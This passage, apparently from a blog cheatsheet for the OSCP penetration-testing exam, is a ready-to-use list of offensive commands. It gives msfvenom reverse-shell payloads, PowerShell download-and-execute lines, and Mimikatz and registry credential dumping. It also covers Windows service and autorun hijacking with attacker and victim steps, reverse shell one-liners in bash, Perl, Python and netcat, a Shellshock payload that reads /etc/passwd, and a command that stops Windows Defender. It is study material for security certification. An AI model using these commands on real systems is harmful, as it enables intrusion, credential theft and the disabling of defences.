echo open <IP> 21 > ftp.txt echo anonymous>> ftp.txt echo password>> ftp.txt echo bin
ary>> ftp.txt echo GET <FILE> >> ftp.txt echo bye>> ftp.txt
ftp -v -n -s:ftp.txt

# SMB
copy \\<IP>\<PATH>\<FILE> # Linux -> Windows
copy <FILE> \\<IP>\<PATH>\ # Windows -> Linux

# Powershell
powershell.exe (New-Object System.Net.WebClient).DownloadFile('<URL>', '<DESTINATION_
FILE>')
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('<URL>')
powershell "wget <URL>"

# Python
python.exe -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FIL
E>')"

# CertUtil
certutil.exe -urlcache -split -f "<URL>"

# NETCAT
nc -lvp 1234 > <OUT_FILE>
nc <IP> 1234 < <IN_FILE>
# CURL
curl <URL> -o <OUT_FILE>

GIT
Download .git
mkdir <DESTINATION_FOLDER>
./gitdumper.sh <URL>/.git/ <DESTINATION_FOLDER>

Extract .git content


mkdir <EXTRACT_FOLDER>
./extractor.sh <DESTINATION_FOLDER> <EXTRACT_FOLDER>

HASHES
Windows
reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System

samdump2 System SAM > hashes

Linux
unshadow passwd shadow > hashes

MIMIKATZ
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export

kerberos::list /export

vault::cred
vault::list

lsadump::sam
lsadump::secrets
lsadump::cache

MISCELLANEOUS
Get a Windows path without spaces
# path.cmd
@echo off
echo %~s1

path.cmd "C:\Program Files (x86)\Common Files\test.txt"


C:\PROGRA~2\COMMON~1\test.txt -> Valid path without spaces

MSFVENOM PAYLOAD
Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

PHP
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Then we need to add the <?php at the first line of the file so that it will execute a
s a PHP webpage
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.
php

ASP
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Python
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl

Listener
Metasploit

use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z

Netcat

nc -lvp <PORT>

PASSWORD CRACKING
Online
Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512 hashes
https://hashes.com/en/decrypt/hash

Hashcat
Linux password
hashcat -m 1800 -a 0 hash.txt rockyou.txt
hashcat -m 1800 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

Windows password

hashcat -m 1000 -a 0 hash.txt rockyou.txt


hashcat -m 1000 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

Others
hashcat --example-hashes | grep -i '<BEGINNING_OF_HASH>'

Rules
https://github.com/NotSoSecure/password_cracking_rules

John
john --wordlist=<PASSWORDS_LIST> hash.txt

PIVOTING
Sshuttle
sshuttle <USER>@<IP> <IP_OF_THE_INTERFACE>/CIDR

Proxychains
ssh -f -N -D 9050 <USER>@<IP>
proxychains <COMMAND>

Interesting link
https://artkond.com/2017/03/23/pivoting-guide/

PRIVILE ESCALATION
Linux
Enumeration scripts

bash LinEnum.sh
bash lse.sh -l 1
bash linpeas.sh
python linuxprivchecker.py
./unix-privesc-check standard
Vulnerability scan

perl les2.pl
bash les.sh

Suid checker

python suid3num.py

https://gtfobins.github.io/

Methodology to follow
https://guif.re/linuxeop
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20R
esources/Linux%20-%20Privilege%20Escalation.md
sudo -l
Kernel Exploits
OS Exploits
Password reuse (mysql, .bash_history, 000- default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Writable /etc/passwd
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (PreInvoke)
Windows
Enumeration scripts
General scans

winPEAS.exe
windows-privesc-check2.exe
Seatbelt.exe -group=all
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks;
}"
Powerless.bat
winPEAS.bat

Search for CVE

systeminfo > systeminfo.txt


python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database <DATE>-mssb.xlsx --systeminfo systemin
fo.txt

systeminfo > systeminfo.txt


wmic qfe > qfe.txt
python wes.py -u
python wes.py systeminfo.txt qfe.txt

powershell -exec bypass -command "& { Import-Module .\Sherlock.ps1; Find-AllVulns; }"

Post exploitation

lazagne.exe all
SharpWeb.exe
mimikatz.exe

JuicyPotato (SeImpersonate or SeAssignPrimaryToken)

If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c


:\windows\system32\cmd.exe" -t *
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c
:\windows\system32\cmd.exe" -t * -c <CLSID>

# CLSID
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

Methodology to follow

https://guif.re/windowseop
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://mysecurityjournal.blogspot.com/p/client-side-attacks.html
http://www.fuzzysecurity.com/tutorials/16.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20R
esources/Windows%20-%20Privilege%20Escalation.md

Autorun
Detection

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks;


}"

[*] Checking for modifiable registry autoruns and configs...

Key : HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\My Program


Path : "C:\Program Files\Autorun Program\program.exe"
ModifiableFile : @{Permissions=System.Object[]; ModifiablePath=C:\Program Files\Autor
un Program\program.exe; IdentityReference=Everyone}

or

winPEAS.exe

[+] Autorun Applications(T1010)


Folder: C:\Program Files\Autorun Program
File: C:\Program Files\Autorun Program\program.exe
FilePerms: Everyone [AllAccess]

Exploitation

# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
cd C:\Program Files\Autorun Program\
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.ex
e', '.\program.exe')

To execute it with elevated privileges we need to wait for someone in the Admin group
to login.

AlwaysInstallElevated
Detection

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks;


}"

[*] Checking for AlwaysInstallElevated registry key...

AbuseFunction : Write-UserAddMSI

or

reg query HKLM\Software\Policies\Microsoft\Windows\Installer


reg query HKCU\Software\Policies\Microsoft\Windows\Installer

If both values are equal to 1 then it's vulnerable.

or

winPEAS.exe

[+] Checking AlwaysInstallElevated(T1012)

AlwaysInstallElevated set to 1 in HKLM!


AlwaysInstallElevated set to 1 in HKCU!

Exploitation
# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > program.msi
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.ms
i', 'C:\Temp\program.msi')
msiexec /quiet /qn /i C:\Temp\program.msi

Executable Files
Detection

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks;


}"

[*] Checking service executable and argument permissions...

ServiceName : filepermsvc
Path : "C:\Program Files\File Permissions Service\fileperm
service.exe"
ModifiableFile : C:\Program Files\File Permissions Service\fileperms
ervice.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, Del
eteChild...}
ModifiableFileIdentityReference : Everyone
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'filepermsvc'
CanRestart : True

or

winPEAS.exe

[+] Interesting Services -non Microsoft-(T1007)

filepermsvc(Apache Software Foundation - File Permissions Service)["C:\Program Files\


File Permissions Service\filepermservice.exe"] - Manual - Stopped
File Permissions: Everyone [AllAccess]

Exploitation

# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.ex
e', 'C:\Temp\program.exe')
copy /y c:\Temp\program.exe "C:\Program Files\File Permissions Service\filepermservic
e.exe"
sc start filepermsvc

Startup applications
Detection

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

C:\>icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"


C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F)
TCM-PC\TCM:(I)(OI)(CI)(DE,DC)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
Everyone:(I)(OI)(CI)(RX)

If the user you're connecte with has full access ‘(F)’ to the directory (here Users)
then it's vulnerable.

Exploitation

# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.ex
e', '.\program.exe')

To execute it with elevated privileges we need to wait for someone in the Admin group
to login.

Weak service permission


Detection

# Find all services authenticated users have modify access onto


accesschk.exe /accepteula -uwcqv "Authenticated Users" *

if SERVICE_ALL_ACCESS then vulnerable

# Find all weak folder permissions per drive.


accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\

# Find all weak file permissions per drive.


accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*

or

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks;


}"

[*] Checking service permissions...

ServiceName : daclsvc
Path : "C:\Program Files\DACL Service\daclservice.exe"
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
CanRestart : True
or

winPEAS.exe

[+] Interesting Services -non Microsoft-(T1007)

daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Sto


pped
YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles

[+] Modifiable Services(T1007)


LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
daclsvc: WriteData/CreateFiles

Exploitation

# Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '
.\nc.exe')
sc config <SERVICENAME> binpath= "<PATH>\nc.exe <IP> <PORT> -e cmd.exe"
sc start <SERVICENAME>
or
net start <SERVICENAME>

Unquoted service paths


Detection

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks;


}"

[*] Checking for unquoted service paths...

ServiceName : unquotedsvc
Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathserv
ice.exe
ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\;Identit
yReference=NT AUTHORITY\Authenticated Users}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart : True

ServiceName : unquotedsvc
Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathserv
ice.exe
ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference
=NT AUTHORITY\Authenticated Users}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart : True

or

winPEAS.exe

[+] Interesting Services -non Microsoft-(T1007)

unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common File


s\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected

Exploitation

# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > Common.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
cd "C:\Program Files\Unquoted Path Service\"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Common.exe
', '.\Common.exe')
sc start unquotedsvc
Hot potato
Exploitation

# Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '
.\nc.exe')
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Tater.ps1.
exe', '.\Tater.ps1.exe')
powershell -exec bypass -command "& { Import-Module .\Tater.ps1; Invoke-Tater -Trigge
r 1 -Command '.\nc.exe <IP> <PORT> -e cmd.exe' }"

CVE

# Already compiled exploit


https://github.com/SecWiki/windows-kernel-exploits
https://github.com/abatchy17/WindowsExploits

Windows XP
CVE Description
CVE- ms02_063_pptp_dos - exploits a kernel based overflow when sending abnormal PPTP
2002-1214 Control Data packets - code execution, DoS
CVE-
ms03_026_dcom - exploits a stack buffer overflow in the RPCSS service
2003-0352
CVE-
MS04-011 - ms04_011_lsass - exploits a stack buffer overflow in the LSASS service
2003-0533
CVE- ms04_011_pct - exploits a buffer overflow in the Microsoft Windows SSL PCT
2003-0719 protocol stack - Private communication target overflow
CVE-
ms03_049_netapi - exploits a stack buffer overflow in the NetApi32
2003-0812
CVE- ms04_007_killbill - vulnerability in the bit string decoding code in the Microsoft
2003-0818 ASN.1 library
CVE- ms03_051_fp30reg_chunked - exploit for the chunked encoding buffer overflow
2003-0822 described in MS03-051
CVE-
ms04_031_netdde - exploits a stack buffer overflow in the NetDDE service
2004-0206
CVE- EXPLOIT-DB 14765 - Untrusted search path vulnerability - allows local users to gain
2010-3138 privileges via a Trojan horse
CVE Description
CVE- EXPLOIT-DB 14745 - Untrusted search path vulnerability in wab.exe - allows local
2010-3147 users to gain privileges via a Trojan horse
CVE- ms11_006_createsizeddibsection - exploits a stack-based buffer overflow in
2010-3970 thumbnails within .MIC files - code execution
CVE- Internet Explorer does not properly handle objects in memory - allows remote
2011-1345 execution of code via object
CVE- EXPLOIT-DB 18275 - GDI in windows does not properly validate user-mode input -
2011-5046 allows remote code execution
CVE- Unquoted windows search path - Windows provides the capability of including spaces
2012-4349 in path names - can be root
Windows 7
CVE Description
CVE-2010- ms10_015_kitrap0d - create a new session with SYSTEM privileges via the KiTrap0D
0232 exploit
CVE-2010- ms10_046_shortcut_icon_dllloader - exploits a vulnerability in the handling of
2568 Windows Shortcut files (.LNK) - run a payload
CVE-2010- EXPLOIT-DB 15894 - kernel-mode drivers in windows do not properly manage a
2744 window class - allows privileges escalation
CVE-2010- EXPLOIT-DB - Stack-based buffer overflow in the UpdateFrameTitleForDocument
3227 method - arbitrary code execution
CVE-2014- ms14_058_track_popup_menu - exploits a NULL Pointer Dereference in win32k.sys
4113 - arbitrary code execution
CVE-2014- ms14_060_sandworm - exploits a vulnerability found in Windows Object Linking
4114 and Embedding - arbitrary code execution
CVE-2015- ms15_004_tswbproxy - abuses a process creation policy in Internet Explorer’s
0016 sandbox - code execution
CVE-2018- remote code execution vulnerability exists when the Microsoft XML Core Services
8494 MSXML parser processes user input
Windows 8
CVE Description
CVE- ms13_005_hwnd_broadcast - attacker can broadcast commands from lower Integrity
2013-0008 Level process to a higher one - privilege escalation
CVE-
ms13_053_schlamperei - kernel pool overflow in Win32k - local privilege escalation
2013-1300
CVE- ppr_flatten_rec - exploits EPATHOBJ::pprFlattenRec due to the usage of uninitialized
2013-3660 data - allows memory corruption
CVE- ms13_090_cardspacesigninhelper - exploits CardSpaceClaimCollection class from
2013-3918 the icardie.dll ActiveX control - code execution
CVE- ms14_052_xmldom - uses Microsoft XMLDOM object to enumerate a remote
2013-7331 machine’s filenames
CVE Description
CVE- ms14_068_kerberos_checksum - exploits the Microsoft Kerberos implementation -
2014-6324 privilege escalation
CVE- ms14_064_ole_code_execution - exploits the Windows OLE Automation array
2014-6332 vulnerability
CVE- ms14_064_packager_python - exploits Windows Object Linking and Embedding
2014-6352 (OLE) - arbitrary code execution
CVE- ntapphelpcachecontrol - NtApphelpCacheControl Improper Authorization Check -
2015-0002 privilege escalation
Windows 10
CVE Description
CVE-2015- exploits GUI component of Windows namely the scrollbar element - allows complete
0057 control of a Windows machine
CVE-2015-
MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege
1769
CVE-2015- ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the
2426 atmfd.dll driver
CVE-2015-
MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege
2479
CVE-2015- MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code
2513 Execution
CVE-2015- MS15-088 - Unsafe Command Line Parameter Passing - Could Allow Information
2423 Disclosure
CVE-2015- MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow
2431 Remote Code Execution
CVE-2015- MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects
2441 in memory - allows remote code execution
Windows Server 2003
CVE Description
CVE-2008- ms08_067_netapi - exploits a parsing flaw in the path canonicalization code of
4250 NetAPI32.dll - bypassing NX
CVE-2017- allows an attacker to execute code when a victim opens a specially crafted file -
8487 remote code execution

PROOFS
Linux
echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "
id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/p
roof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "

Windows
echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo
Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Do
cuments and Settings\Administrator\Desktop\proof.txt"

REVERSE SHELL
Amazing tool for shell generation
# Download
git clone https://github.com/ShutdownRepo/shellerator

# Install requirements
pip3 install --user -r requirements.txt

# Executable from anywhere


sudo cp shellrator.py /bin/shellrator

Bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Perl
perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("
tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&
S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STR
EAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2
(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f

More reverse shell


http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Interactive shell
# Python
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Bash
echo os.system('/bin/bash')

# Sh
/bin/bash -i

# Perl
perl -e 'exec "/bin/bash"'

# Ruby
exec "/bin/bash"

# Lua
os.execute('/bin/bash')

Adjust Interactive shell


stty size # Find your terminal size -> 50 235
Ctrl-Z
stty raw -echo // Disable shell echo
fg
export SHELL=bash
export TERM=xterm OR export TERM=xterm-256color
stty rows 50 columns 235

SHELLSHOCK
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" <URL>/cgi
-bin/<SCRIPT>

USEFUL LINUX COMMANDS


Find a file
locate <FILE>
find / -name "<FILE>"

Active connection
netstat -lntp

List all SUID files


find / -perm -4000 2>/dev/null

Determine the current version of Linux


cat /etc/issue
Determine more information about the environment
uname -a

List processes running


ps -faux

List the allowed (and forbidden) commands for the


invoking use
sudo -l

USEFUL WINDOWS COMMANDS


net config Workstation
systeminfo
net users

ipconfig /all
netstat -ano

schtasks /query /fo LIST /v


tasklist /SVC
net start
DRIVERQUERY

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated


reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

dir /s pass == cred == vnc == .config


findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Disable windows defender


sc stop WinDefend

# Bypass restriction
powershell -nop -ep bypass

# List hidden files


dir /a

# Find a file
dir /b/s "<FILE>"

ZIP
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' file.zip

zip2john file.zip > zip.john


john --wordlist=<PASSWORDS_LIST> zip.john

• OSCP (30) ,

• Cheatsheet (5)

Share Post
Twitter Facebook Google+
• ← Previous

• Next →

© 2023 Liodeus.

You might also like